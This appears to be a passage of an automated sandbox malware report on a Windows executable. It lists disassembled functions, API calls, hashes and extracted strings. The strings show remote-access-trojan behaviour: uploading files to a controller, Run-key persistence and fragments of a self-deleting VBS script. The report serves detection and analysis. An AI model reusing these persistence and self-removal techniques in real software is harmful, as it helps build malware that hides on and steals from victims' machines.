                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _free$EnvironmentVariable$_wcschr
                                                                                • String ID:
                                                                                • API String ID: 3899193279-0
                                                                                • Opcode ID: 3115d919f98adbdf348e15764fef8bbbb7a878b40742b6c11840eb3b67a2620e
                                                                                • Instruction ID: 8ac3cd9939a067627e1c481289c57a7f9f94b657261427fab31af25724b0c78e
                                                                                • Opcode Fuzzy Hash: 3115d919f98adbdf348e15764fef8bbbb7a878b40742b6c11840eb3b67a2620e
                                                                                • Instruction Fuzzy Hash: 96D13C719007007FFB25AF7B9881A6F7BA4BF02314F0541AFF905A7381E63989418B9D
                                                                                Function 00411C81 Relevance: 25.0, APIs: 9, Strings: 5, Instructions: 479sleepfileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00411C9A
                                                                                  • Part of subcall function 0041AB38: GetCurrentProcessId.KERNEL32(00000000,74DF3530,00000000,?,?,?,?,00465900,0040C07B,.vbs,?,?,?,?,?,004742F8), ref: 0041AB5F
                                                                                  • Part of subcall function 004176B6: CloseHandle.KERNEL32(00403AB9,?,?,00403AB9,00465324), ref: 004176CC
                                                                                  • Part of subcall function 004176B6: CloseHandle.KERNEL32($SF,?,?,00403AB9,00465324), ref: 004176D5
                                                                                • Sleep.KERNEL32(0000000A,00465324), ref: 00411DEC
                                                                                • Sleep.KERNEL32(0000000A,00465324,00465324), ref: 00411E8E
                                                                                • Sleep.KERNEL32(0000000A,00465324,00465324,00465324), ref: 00411F30
                                                                                • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00411F91
                                                                                • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00411FC8
                                                                                • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00412004
                                                                                • Sleep.KERNEL32(000001F4,00465324,00465324,00465324), ref: 0041201E
                                                                                • Sleep.KERNEL32(00000064), ref: 00412060
                                                                                  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                                                                • String ID: /stext "$HDG$HDG$>G$>G
                                                                                • API String ID: 1223786279-3931108886
                                                                                • Opcode ID: 8bcf76c321c35297f8406ce82bbb0d4928716ef5ba298cb45a686cdac7af4554
                                                                                • Instruction ID: 1febf249a593eb43810efab42e14b6693ac358e03ba90545e56d33427da79e18
                                                                                • Opcode Fuzzy Hash: 8bcf76c321c35297f8406ce82bbb0d4928716ef5ba298cb45a686cdac7af4554
                                                                                • Instruction Fuzzy Hash: 960243315083414AC325FB61D891AEFB7D5AFD4308F50493FF88A931E2EF785A49C69A
                                                                                Function 00413E37 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 109libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00413E86
                                                                                • LoadLibraryA.KERNEL32(?), ref: 00413EC8
                                                                                • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413EE8
                                                                                • FreeLibrary.KERNEL32(00000000), ref: 00413EEF
                                                                                • LoadLibraryA.KERNEL32(?), ref: 00413F27
                                                                                • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413F39
                                                                                • FreeLibrary.KERNEL32(00000000), ref: 00413F40
                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00413F4F
                                                                                • FreeLibrary.KERNEL32(00000000), ref: 00413F66
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                                                                • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                                                                                • API String ID: 2490988753-744132762
                                                                                • Opcode ID: ba6e91efba9758633ea9bec27d31a254a4df24d425156724d9bfa6bc4db7eb59
                                                                                • Instruction ID: a4547f3d416e9253f7b1cbdd0907a67efdadb69b2b53743d1710677937ed8fa2
                                                                                • Opcode Fuzzy Hash: ba6e91efba9758633ea9bec27d31a254a4df24d425156724d9bfa6bc4db7eb59
                                                                                • Instruction Fuzzy Hash: 6D31C4B1906315A7D320AF25DC44ACBB7ECEF44745F400A2AF844D3201D778DA858AEE
                                                                                Function 0078C16B Relevance: 23.0, APIs: 4, Strings: 9, Instructions: 260registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00791900: TerminateProcess.KERNEL32(00000000,?,0078C8E4), ref: 00791910
                                                                                  • Part of subcall function 00791900: WaitForSingleObject.KERNEL32(000000FF,?,0078C8E4), ref: 00791923
                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0078C27A
                                                                                • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0078C28D
                                                                                  • Part of subcall function 0079AD9F: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,00783CA7), ref: 0079ADC6
                                                                                • ShellExecuteW.SHELL32(00000000,0046559C,00000000,00465900,00465900,00000000), ref: 0078C4E7
                                                                                • ExitProcess.KERNEL32 ref: 0078C4EE
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Process$CurrentDeleteExecuteExitFileModuleNameObjectShellSingleTerminateWait
                                                                                • String ID: @CG$On Error Resume Next$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$`=G$exepath$fso.DeleteFolder "$pth_unenc$while fso.FileExists("
                                                                                • API String ID: 508158800-1730539264
                                                                                • Opcode ID: cadd17a6f3b3dd84aa2841c1ffb737251bc648ed92d01ac99516321e3e8970e8
                                                                                • Instruction ID: 1f5e8d91f6efea3b0d17e137d7076397c527b0401654d53bd6959034b7f4b240
                                                                                • Opcode Fuzzy Hash: cadd17a6f3b3dd84aa2841c1ffb737251bc648ed92d01ac99516321e3e8970e8
                                                                                • Instruction Fuzzy Hash: 4281A2716883409BC725FB24E86AEBF73A9AF90701F10442EF44657193EF6C9D0AC796
                                                                                Function 0041CA9E Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 73windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041CAE9
                                                                                • GetCursorPos.USER32(?), ref: 0041CAF8
                                                                                • SetForegroundWindow.USER32(?), ref: 0041CB01
                                                                                • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041CB1B
                                                                                • Shell_NotifyIconA.SHELL32(00000002,00473B50), ref: 0041CB6C
                                                                                • ExitProcess.KERNEL32 ref: 0041CB74
                                                                                • CreatePopupMenu.USER32 ref: 0041CB7A
                                                                                • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041CB8F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                                                                • String ID: Close
                                                                                • API String ID: 1657328048-3535843008
                                                                                • Opcode ID: 17791859dac929b483a24ff72816a8478769eebc5405c417f6cbcdd658e3cffe
                                                                                • Instruction ID: a66ed96c0d91d71762f770de87d5f41dd37c70c4e97b210e23d221b2b7ccacbc
                                                                                • Opcode Fuzzy Hash: 17791859dac929b483a24ff72816a8478769eebc5405c417f6cbcdd658e3cffe
                                                                                • Instruction Fuzzy Hash: 68212B71188209FFDB064F64FD4EAAA3F65EB04342F044135B906D40B2D7B9EA90EB18
                                                                                Function 00444F3D Relevance: 22.8, APIs: 15, Instructions: 296COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _free$Info
                                                                                • String ID:
                                                                                • API String ID: 2509303402-0
                                                                                • Opcode ID: 92603ff5876a01059927d2e021ea2dcfde124e6bc6800bb968541682ce1897e5
                                                                                • Instruction ID: 0af7f9009007d8880989bd470fdb3e4a62bb8e65dbd2af1b74ff5c8893cb1db7
                                                                                • Opcode Fuzzy Hash: 92603ff5876a01059927d2e021ea2dcfde124e6bc6800bb968541682ce1897e5
                                                                                • Instruction Fuzzy Hash: D0B18F71900605AFEF11DFA9C881BEEBBF4BF49304F14406EF855B7242DA79A8458B64
                                                                                Function 00407DEF Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 325fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00407F4C
                                                                                • GetFileSizeEx.KERNEL32(00000000,00000000), ref: 00407FC2
                                                                                • __aulldiv.LIBCMT ref: 00407FE9
                                                                                • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 0040810D
                                                                                • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408128
                                                                                • CloseHandle.KERNEL32(00000000), ref: 00408200
                                                                                • CloseHandle.KERNEL32(00000000,00000052,00000000,?), ref: 0040821A
                                                                                • CloseHandle.KERNEL32(00000000), ref: 00408256
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$CloseHandle$CreatePointerReadSize__aulldiv
                                                                                • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $>G
                                                                                • API String ID: 1884690901-3066803209
                                                                                • Opcode ID: e05586a99a6dd4973ed6b88060a57d8a8c1e6a93b9a68da99042f90bfc217902
                                                                                • Instruction ID: 222450ca6543349723abdfa1177da379b39b5876d7444fbb960ea0ab75079841
                                                                                • Opcode Fuzzy Hash: e05586a99a6dd4973ed6b88060a57d8a8c1e6a93b9a68da99042f90bfc217902
                                                                                • Instruction Fuzzy Hash: DAB191316083409BC214FB25C892AAFB7E5AFD4314F40492EF885632D2EF789945C79B
                                                                                Function 0078BECE Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 203COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _wcslen.LIBCMT ref: 0078BEDC
                                                                                • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0078BEF5
                                                                                • _wcslen.LIBCMT ref: 0078BFBB
                                                                                • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0078C043
                                                                                • _wcslen.LIBCMT ref: 0078C09B
                                                                                • CloseHandle.KERNEL32 ref: 0078C102
                                                                                • ShellExecuteW.SHELL32(00000000,0046559C,00000000,00465900,00465900,00000001), ref: 0078C120
                                                                                • ExitProcess.KERNEL32 ref: 0078C137
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _wcslen$CreateDirectory$CloseExecuteExitHandleProcessShell
                                                                                • String ID: 6$C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe$BG$BG
                                                                                • API String ID: 3303048660-905209664
                                                                                • Opcode ID: 0ce300c52b2574979d2682925cabc15749f3fad58451f58e2d3683bc22aef4dd
                                                                                • Instruction ID: 2a34a3a37d0c618b07c37466d260167f5724cc73cb42df4688881f09da25a181
                                                                                • Opcode Fuzzy Hash: 0ce300c52b2574979d2682925cabc15749f3fad58451f58e2d3683bc22aef4dd
                                                                                • Instruction Fuzzy Hash: C651D130388304EBDA29B774AC5AF7E2799AF80741F50442DF40A961D3EF6D9D46C36A
                                                                                Function 00409E48 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 163sleepCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • Sleep.KERNEL32(00001388), ref: 00409E62
                                                                                  • Part of subcall function 00409D97: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409E6F), ref: 00409DCD
                                                                                  • Part of subcall function 00409D97: GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409E6F), ref: 00409DDC
                                                                                  • Part of subcall function 00409D97: Sleep.KERNEL32(00002710,?,?,?,00409E6F), ref: 00409E09
                                                                                  • Part of subcall function 00409D97: CloseHandle.KERNEL32(00000000,?,?,?,00409E6F), ref: 00409E10
                                                                                • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00409E9E
                                                                                • GetFileAttributesW.KERNEL32(00000000), ref: 00409EAF
                                                                                • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 00409EC6
                                                                                • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 00409F40
                                                                                  • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                                                                                • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00465900,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A049
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                                                                • String ID: @CG$@CG$XCG$XCG$xAG$xAG
                                                                                • API String ID: 3795512280-3163867910
                                                                                • Opcode ID: 727bc27e4168a8b1df7dc1eb64ab9d23630241c8d7fc75df583e13fa58b12fe7
                                                                                • Instruction ID: b7dfc09a395f5416f32c5fe597dbb364f69b6ed32616efff49b152d1c9b912f4
                                                                                • Opcode Fuzzy Hash: 727bc27e4168a8b1df7dc1eb64ab9d23630241c8d7fc75df583e13fa58b12fe7
                                                                                • Instruction Fuzzy Hash: 30518D716043005ACB05BB72D866ABF769AAFD1309F00053FF886B71E2DF3D9D44869A
                                                                                Function 0078A0AF Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 163sleepCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • Sleep.KERNEL32(00001388), ref: 0078A0C9
                                                                                  • Part of subcall function 00789FFE: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0078A0D6), ref: 0078A034
                                                                                  • Part of subcall function 00789FFE: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0078A0D6), ref: 0078A043
                                                                                  • Part of subcall function 00789FFE: Sleep.KERNEL32(00002710,?,?,?,0078A0D6), ref: 0078A070
                                                                                  • Part of subcall function 00789FFE: CloseHandle.KERNEL32(00000000,?,?,?,0078A0D6), ref: 0078A077
                                                                                • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0078A105
                                                                                • GetFileAttributesW.KERNEL32(00000000), ref: 0078A116
                                                                                • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0078A12D
                                                                                • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 0078A1A7
                                                                                  • Part of subcall function 0079B881: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,00783D5A,00465324), ref: 0079B89A
                                                                                • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00465900,00000000,00000000,00000000), ref: 0078A2B0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                                                                • String ID: @CG$@CG$XCG$XCG$xAG$xAG
                                                                                • API String ID: 3795512280-3163867910
                                                                                • Opcode ID: f1eb223cb7d2e6894d1a2c78ceddde7f199078b5105718b7a6d2036e1116f8b0
                                                                                • Instruction ID: 95c4f997bb61d4ecbadbdc89267f99d5b06174b62c68e7175608a83774ff8744
                                                                                • Opcode Fuzzy Hash: f1eb223cb7d2e6894d1a2c78ceddde7f199078b5105718b7a6d2036e1116f8b0
                                                                                • Instruction Fuzzy Hash: 3651B130784304DBCB19BB74986EABE739AAF80301F40056DF542A71D3EF2D9906C756
                                                                                Function 0045006D Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ___free_lconv_mon.LIBCMT ref: 004500B1
                                                                                  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F300
                                                                                  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F312
                                                                                  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F324
                                                                                  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F336
                                                                                  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F348
                                                                                  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F35A
                                                                                  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F36C
                                                                                  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F37E
                                                                                  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F390
                                                                                  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3A2
                                                                                  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3B4
                                                                                  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3C6
                                                                                  • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3D8
                                                                                • _free.LIBCMT ref: 004500A6
                                                                                  • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
                                                                                  • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                                                                                • _free.LIBCMT ref: 004500C8
                                                                                • _free.LIBCMT ref: 004500DD
                                                                                • _free.LIBCMT ref: 004500E8
                                                                                • _free.LIBCMT ref: 0045010A
                                                                                • _free.LIBCMT ref: 0045011D
                                                                                • _free.LIBCMT ref: 0045012B
                                                                                • _free.LIBCMT ref: 00450136
                                                                                • _free.LIBCMT ref: 0045016E
                                                                                • _free.LIBCMT ref: 00450175
                                                                                • _free.LIBCMT ref: 00450192
                                                                                • _free.LIBCMT ref: 004501AA
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                • String ID:
                                                                                • API String ID: 161543041-0
                                                                                • Opcode ID: bcc467a133590e08c2246ffecdc9577bb20b6303625806e8b1892e2aaa35b24d
                                                                                • Instruction ID: 6df0fc8d0da410edbfddc8482cd9dc810a80ebbb5b2f86b8c24a0bb33e3d08c7
                                                                                • Opcode Fuzzy Hash: bcc467a133590e08c2246ffecdc9577bb20b6303625806e8b1892e2aaa35b24d
                                                                                • Instruction Fuzzy Hash: 96317235500B00AFEB20AA35D845B5B73E5AF42355F15841FF849E7292DF39AC98CB1A
                                                                                Function 007D02D4 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ___free_lconv_mon.LIBCMT ref: 007D0318
                                                                                  • Part of subcall function 007CF54A: _free.LIBCMT ref: 007CF567
                                                                                  • Part of subcall function 007CF54A: _free.LIBCMT ref: 007CF579
                                                                                  • Part of subcall function 007CF54A: _free.LIBCMT ref: 007CF58B
                                                                                  • Part of subcall function 007CF54A: _free.LIBCMT ref: 007CF59D
                                                                                  • Part of subcall function 007CF54A: _free.LIBCMT ref: 007CF5AF
                                                                                  • Part of subcall function 007CF54A: _free.LIBCMT ref: 007CF5C1
                                                                                  • Part of subcall function 007CF54A: _free.LIBCMT ref: 007CF5D3
                                                                                  • Part of subcall function 007CF54A: _free.LIBCMT ref: 007CF5E5
                                                                                  • Part of subcall function 007CF54A: _free.LIBCMT ref: 007CF5F7
                                                                                  • Part of subcall function 007CF54A: _free.LIBCMT ref: 007CF609
                                                                                  • Part of subcall function 007CF54A: _free.LIBCMT ref: 007CF61B
                                                                                  • Part of subcall function 007CF54A: _free.LIBCMT ref: 007CF62D
                                                                                  • Part of subcall function 007CF54A: _free.LIBCMT ref: 007CF63F
                                                                                • _free.LIBCMT ref: 007D030D
                                                                                  • Part of subcall function 007C6D2C: HeapFree.KERNEL32(00000000,00000000,?,007CFCB7,?,00000000,?,00000000,?,007CFF5B,?,00000007,?,?,007D046C,?), ref: 007C6D42
                                                                                  • Part of subcall function 007C6D2C: GetLastError.KERNEL32(?,?,007CFCB7,?,00000000,?,00000000,?,007CFF5B,?,00000007,?,?,007D046C,?,?), ref: 007C6D54
                                                                                • _free.LIBCMT ref: 007D032F
                                                                                • _free.LIBCMT ref: 007D0344
                                                                                • _free.LIBCMT ref: 007D034F
                                                                                • _free.LIBCMT ref: 007D0371
                                                                                • _free.LIBCMT ref: 007D0384
                                                                                • _free.LIBCMT ref: 007D0392
                                                                                • _free.LIBCMT ref: 007D039D
                                                                                • _free.LIBCMT ref: 007D03D5
                                                                                • _free.LIBCMT ref: 007D03DC
                                                                                • _free.LIBCMT ref: 007D03F9
                                                                                • _free.LIBCMT ref: 007D0411
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                • String ID:
                                                                                • API String ID: 161543041-0
                                                                                • Opcode ID: bcc467a133590e08c2246ffecdc9577bb20b6303625806e8b1892e2aaa35b24d
                                                                                • Instruction ID: 07409b979baa0f9e84476843531a166a7d9aa41b17a860e2a52a7b09bc7f2531
                                                                                • Opcode Fuzzy Hash: bcc467a133590e08c2246ffecdc9577bb20b6303625806e8b1892e2aaa35b24d
                                                                                • Instruction Fuzzy Hash: F4313931700204DFEF61AA39E889B5A7BFAEF00310F14652EE459D7261DF3AEC50C664
                                                                                Function 0079119D Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 238threadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetCurrentProcessId.KERNEL32 ref: 007911AC
                                                                                  • Part of subcall function 00792A3C: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 00792A4A
                                                                                  • Part of subcall function 00792A3C: RegSetValueExA.ADVAPI32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0078BBB3,004660E0,00000001,000000AF,00465554), ref: 00792A65
                                                                                  • Part of subcall function 00792A3C: RegCloseKey.ADVAPI32(?,?,?,?,0078BBB3,004660E0,00000001,000000AF,00465554), ref: 00792A70
                                                                                • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 007911E8
                                                                                • CreateThread.KERNEL32(00000000,00000000,00411637,00000000,00000000,00000000), ref: 0079124D
                                                                                  • Part of subcall function 0079271E: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000), ref: 0079273E
                                                                                  • Part of subcall function 0079271E: RegQueryValueExA.ADVAPI32(00000000,?,00000000,?,?,?), ref: 0079275C
                                                                                  • Part of subcall function 0079271E: RegCloseKey.ADVAPI32(00000000), ref: 00792767
                                                                                • CloseHandle.KERNEL32(00000000), ref: 007911F7
                                                                                  • Part of subcall function 0079A8ED: GetLocalTime.KERNEL32(00000000), ref: 0079A907
                                                                                • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 007914C1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseOpen$CreateProcessValue$CurrentHandleLocalMutexQueryThreadTime
                                                                                • String ID: 0DG$TTF$WDH$BG
                                                                                • API String ID: 65172268-1505503698
                                                                                • Opcode ID: cfd1e48dead6c5d3f6b6817fbfe2d8e6c01e86e7030477cd0b94be603cb5524d
                                                                                • Instruction ID: 2f1dc5b3b758545a8e243245b15f08defb3977f4b002ac4a3b329dd87613c132
                                                                                • Opcode Fuzzy Hash: cfd1e48dead6c5d3f6b6817fbfe2d8e6c01e86e7030477cd0b94be603cb5524d
                                                                                • Instruction Fuzzy Hash: 7C717131648241EBCA14FB74EC5BDAE73A4AF90752F50052DF442521A3EF2C9A0AC7A7
                                                                                Function 00419128 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 174sleeptimeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __EH_prolog.LIBCMT ref: 0041912D
                                                                                • GdiplusStartup.GDIPLUS(00473AF0,?,00000000), ref: 0041915F
                                                                                • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 004191EB
                                                                                • Sleep.KERNEL32(000003E8), ref: 0041926D
                                                                                • GetLocalTime.KERNEL32(?), ref: 0041927C
                                                                                • Sleep.KERNEL32(00000000,00000018,00000000), ref: 00419365
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
